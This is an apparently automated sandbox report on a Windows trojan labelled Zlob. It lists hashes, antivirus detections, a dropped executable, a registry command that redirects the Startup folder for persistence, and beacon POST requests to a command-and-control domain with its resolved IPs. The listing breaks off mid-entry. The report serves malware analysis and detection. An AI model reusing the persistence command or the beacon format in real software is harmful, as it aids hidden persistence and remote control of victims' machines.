paladin316

Zlob Malware JSON Report

Jun 18th, 2019
  1.  
  2. [*] MalFamily: "Zlob"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "01"
  7. [*] File Size: 57096
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "d08e515044a61b2b2dad9deda564460914a9559cdfb9772babf04039d3814252"
  10. [*] MD5: "8caf035dd4cf30a9904ff243c372df6e"
  11. [*] SHA1: "470bc49c9d3923c73148dd9d58395199f9743df5"
  12. [*] SHA512: "e53f36e0c8e6b4662c5a6e06a1c8c8f42bd3d0c4f3f75642ca2ab96df189132686b4142959d2f622dc8336835ed5e752f1efce26e12957a2609ad7ccc5c433a2"
  13. [*] CRC32: "13613AA0"
  14. [*] SSDEEP: "768:3P6FP6vnVPXovpOg0nBZpfW89DvGH7dc7vCy6vUg/O43ZY1KgGEJC:CFAPXfg0nzpV9rGHq7v1x4paoEA"
  15.  
  16. [*] Process Execution: [
  17. "01.exe",
  18. "hkmoov.exe",
  19. "reg.exe"
  20. ]
  21.  
  22. [*] Signatures Detected: [
  23. {
  24. "Description": "Creates RWX memory",
  25. "Details": []
  26. },
  27. {
  28. "Description": "A process attempted to delay the analysis task.",
  29. "Details": [
  30. {
  31. "Process": "hkmoov.exe tried to sleep 1740 seconds, actually delayed analysis time by 0 seconds"
  32. }
  33. ]
  34. },
  35. {
  36. "Description": "Reads data out of its own binary image",
  37. "Details": [
  38. {
  39. "self_read": "process: 01.exe, pid: 2704, offset: 0x00000000, length: 0x0000df08"
  40. }
  41. ]
  42. },
  43. {
  44. "Description": "Drops a binary and executes it",
  45. "Details": [
  46. {
  47. "binary": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  48. }
  49. ]
  50. },
  51. {
  52. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  53. "Details": [
  54. {
  55. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  56. },
  57. {
  58. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  59. },
  60. {
  61. "suspicious_request": "http://safegross.com/ppk/index.php"
  62. },
  63. {
  64. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  65. },
  66. {
  67. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  68. },
  69. {
  70. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  71. },
  72. {
  73. "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  74. },
  75. {
  76. "suspicious_request": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  77. }
  78. ]
  79. },
  80. {
  81. "Description": "Performs some HTTP requests",
  82. "Details": [
  83. {
  84. "url": "http://safegross.com/ppk/index.php"
  85. },
  86. {
  87. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  88. },
  89. {
  90. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  91. },
  92. {
  93. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  94. },
  95. {
  96. "url": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  97. },
  98. {
  99. "url": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  100. }
  101. ]
  102. },
  103. {
  104. "Description": "Attempts to identify installed AV products by installation directory",
  105. "Details": [
  106. {
  107. "file": "C:\\ProgramData\\AVAST Software"
  108. },
  109. {
  110. "file": "C:\\ProgramData\\Avira"
  111. },
  112. {
  113. "file": "C:\\ProgramData\\Kaspersky Lab"
  114. },
  115. {
  116. "file": "C:\\ProgramData\\ESET"
  117. },
  118. {
  119. "file": "C:\\ProgramData\\Panda Security"
  120. },
  121. {
  122. "file": "C:\\ProgramData\\Bitdefender"
  123. },
  124. {
  125. "file": "C:\\ProgramData\\AVG"
  126. },
  127. {
  128. "file": "C:\\ProgramData\\Doctor Web"
  129. }
  130. ]
  131. },
  132. {
  133. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  134. "Details": [
  135. {
  136. "FireEye": "Generic.mg.8caf035dd4cf30a9"
  137. },
  138. {
  139. "McAfee": "Artemis!8CAF035DD4CF"
  140. },
  141. {
  142. "ESET-NOD32": "a variant of Win32/Kryptik.GUCF"
  143. },
  144. {
  145. "Paloalto": "generic.ml"
  146. },
  147. {
  148. "Kaspersky": "Trojan.Win32.Agent.xaalpa"
  149. },
  150. {
  151. "Avast": "Win32:BackdoorX-gen [Trj]"
  152. },
  153. {
  154. "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  155. },
  156. {
  157. "Sophos": "Troj/Agent-BBUR"
  158. },
  159. {
  160. "F-Secure": "Trojan.TR/AD.Zlob.wkfyf"
  161. },
  162. {
  163. "DrWeb": "Trojan.SpyBot.840"
  164. },
  165. {
  166. "Invincea": "heuristic"
  167. },
  168. {
  169. "McAfee-GW-Edition": "Artemis!Trojan"
  170. },
  171. {
  172. "Ikarus": "Backdoor.Rat.FlawedAmmyy"
  173. },
  174. {
  175. "Avira": "TR/AD.Zlob.wkfyf"
  176. },
  177. {
  178. "Microsoft": "TrojanDownloader:Win32/Zlob.ZXP!bit"
  179. },
  180. {
  181. "Endgame": "malicious (high confidence)"
  182. },
  183. {
  184. "ZoneAlarm": "Trojan.Win32.Agent.xaalpa"
  185. },
  186. {
  187. "AhnLab-V3": "Trojan/Win32.Agent.C3291732"
  188. },
  189. {
  190. "ALYac": "Backdoor.RAT.FlawedAmmyy"
  191. },
  192. {
  193. "Tencent": "Win32.Trojan.Raasmx.Auto"
  194. },
  195. {
  196. "SentinelOne": "DFI - Suspicious PE"
  197. },
  198. {
  199. "Fortinet": "W32/GenKryptik.DKZJ!tr"
  200. },
  201. {
  202. "AVG": "Win32:BackdoorX-gen [Trj]"
  203. },
  204. {
  205. "CrowdStrike": "win/malicious_confidence_70% (W)"
  206. }
  207. ]
  208. },
  209. {
  210. "Description": "Creates a copy of itself",
  211. "Details": [
  212. {
  213. "copy": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  214. }
  215. ]
  216. }
  217. ]
  218.  
  219. [*] Started Service: []
  220.  
  221. [*] Executed Commands: [
  222. "c:\\programdata\\d61e6e07ea\\hkmoov.exe",
  223. "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\d61e6e07ea"
  224. ]
  225.  
  226. [*] Mutexes: []
  227.  
  228. [*] Modified Files: [
  229. "C:\\ProgramData\\0",
  230. "C:\\programdata\\d61e6e07ea\\hkmoov.exe",
  231. "C:\\programdata\\d61e6e07ea\\hkmoov.exe:Zone.Identifier"
  232. ]
  233.  
  234. [*] Deleted Files: []
  235.  
  236. [*] Modified Registry Keys: [
  237. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  238. ]
  239.  
  240. [*] Deleted Registry Keys: []
  241.  
  242. [*] DNS Communications: [
  243. {
  244. "type": "A",
  245. "request": "safegross.com",
  246. "answers": [
  247. {
  248. "data": "151.237.80.80",
  249. "type": "A"
  250. },
  251. {
  252. "data": "89.238.207.5",
  253. "type": "A"
  254. },
  255. {
  256. "data": "93.103.166.70",
  257. "type": "A"
  258. },
  259. {
  260. "data": "37.152.176.90",
  261. "type": "A"
  262. },
  263. {
  264. "data": "91.104.177.151",
  265. "type": "A"
  266. },
  267. {
  268. "data": "89.190.74.198",
  269. "type": "A"
  270. },
  271. {
  272. "data": "2.185.146.116",
  273. "type": "A"
  274. },
  275. {
  276. "data": "5.253.53.236",
  277. "type": "A"
  278. },
  279. {
  280. "data": "95.158.162.200",
  281. "type": "A"
  282. },
  283. {
  284. "data": "197.255.225.249",
  285. "type": "A"
  286. },
  287. {
  288. "data": "89.45.19.26",
  289. "type": "A"
  290. },
  291. {
  292. "data": "186.87.135.97",
  293. "type": "A"
  294. },
  295. {
  296. "data": "193.33.1.18",
  297. "type": "A"
  298. },
  299. {
  300. "data": "31.5.167.149",
  301. "type": "A"
  302. },
  303. {
  304. "data": "41.110.200.194",
  305. "type": "A"
  306. },
  307. {
  308. "data": "85.187.48.16",
  309. "type": "A"
  310. },
  311. {
  312. "data": "181.59.254.21",
  313. "type": "A"
  314. },
  315. {
  316. "data": "89.45.19.24",
  317. "type": "A"
  318. },
  319. {
  320. "data": "86.101.230.109",
  321. "type": "A"
  322. }
  323. ]
  324. }
  325. ]
  326.  
  327. [*] Domains: [
  328. {
  329. "ip": "",
  330. "domain": "safegross.com"
  331. }
  332. ]
  333.  
  334. [*] Network Communication - ICMP: []
  335.  
  336. [*] Network Communication - HTTP: [
  337. {
  338. "count": 29,
  339. "body": "id=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  340. "uri": "http://safegross.com/ppk/index.php",
  341. "user-agent": "",
  342. "method": "POST",
  343. "host": "safegross.com",
  344. "version": "1.1",
  345. "path": "/ppk/index.php",
  346. "data": "POST /ppk/index.php HTTP/1.1\r\nHost: safegross.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  347. "port": 80
  348. },
  349. {
  350. "count": 1,
  351. "body": "",
  352. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  353. "user-agent": "Microsoft-CryptoAPI/6.1",
  354. "method": "GET",
  355. "host": "ocsp.digicert.com",
  356. "version": "1.1",
  357. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  358. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  359. "port": 80
  360. },
  361. {
  362. "count": 1,
  363. "body": "",
  364. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  365. "user-agent": "Microsoft-CryptoAPI/6.1",
  366. "method": "GET",
  367. "host": "ocsp.digicert.com",
  368. "version": "1.1",
  369. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  370. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  371. "port": 80
  372. },
  373. {
  374. "count": 1,
  375. "body": "",
  376. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  377. "user-agent": "Microsoft-CryptoAPI/6.1",
  378. "method": "GET",
  379. "host": "ocsp.digicert.com",
  380. "version": "1.1",
  381. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  382. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  383. "port": 80
  384. },
  385. {
  386. "count": 1,
  387. "body": "",
  388. "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  389. "user-agent": "Microsoft BITS/7.5",
  390. "method": "HEAD",
  391. "host": "redirector.gvt1.com",
  392. "version": "1.1",
  393. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  394. "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  395. "port": 80
  396. },
  397. {
  398. "count": 1,
  399. "body": "",
  400. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  401. "user-agent": "Microsoft BITS/7.5",
  402. "method": "HEAD",
  403. "host": "r5---sn-tt1e7n7e.gvt1.com",
  404. "version": "1.1",
  405. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  406. "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  407. "port": 80
  408. },
  409. {
  410. "count": 1,
  411. "body": "",
  412. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  413. "user-agent": "Microsoft BITS/7.5",
  414. "method": "GET",
  415. "host": "r5---sn-tt1e7n7e.gvt1.com",
  416. "version": "1.1",
  417. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  418. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=0-6820\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  419. "port": 80
  420. },
  421. {
  422. "count": 1,
  423. "body": "",
  424. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  425. "user-agent": "Microsoft BITS/7.5",
  426. "method": "GET",
  427. "host": "r5---sn-tt1e7n7e.gvt1.com",
  428. "version": "1.1",
  429. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  430. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6821-17424\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  431. "port": 80
  432. },
  433. {
  434. "count": 1,
  435. "body": "",
  436. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  437. "user-agent": "Microsoft BITS/7.5",
  438. "method": "GET",
  439. "host": "r5---sn-tt1e7n7e.gvt1.com",
  440. "version": "1.1",
  441. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  442. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=17425-27568\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  443. "port": 80
  444. },
  445. {
  446. "count": 1,
  447. "body": "",
  448. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  449. "user-agent": "Microsoft BITS/7.5",
  450. "method": "GET",
  451. "host": "r5---sn-tt1e7n7e.gvt1.com",
  452. "version": "1.1",
  453. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  454. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27569-38149\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  455. "port": 80
  456. },
  457. {
  458. "count": 1,
  459. "body": "",
  460. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  461. "user-agent": "Microsoft BITS/7.5",
  462. "method": "GET",
  463. "host": "r5---sn-tt1e7n7e.gvt1.com",
  464. "version": "1.1",
  465. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  466. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=38150-60344\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  467. "port": 80
  468. },
  469. {
  470. "count": 1,
  471. "body": "",
  472. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  473. "user-agent": "Microsoft BITS/7.5",
  474. "method": "GET",
  475. "host": "r5---sn-tt1e7n7e.gvt1.com",
  476. "version": "1.1",
  477. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  478. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=60345-105675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  479. "port": 80
  480. },
  481. {
  482. "count": 1,
  483. "body": "",
  484. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  485. "user-agent": "Microsoft BITS/7.5",
  486. "method": "GET",
  487. "host": "r5---sn-tt1e7n7e.gvt1.com",
  488. "version": "1.1",
  489. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  490. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=105676-182544\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  491. "port": 80
  492. },
  493. {
  494. "count": 1,
  495. "body": "",
  496. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  497. "user-agent": "Microsoft BITS/7.5",
  498. "method": "GET",
  499. "host": "r5---sn-tt1e7n7e.gvt1.com",
  500. "version": "1.1",
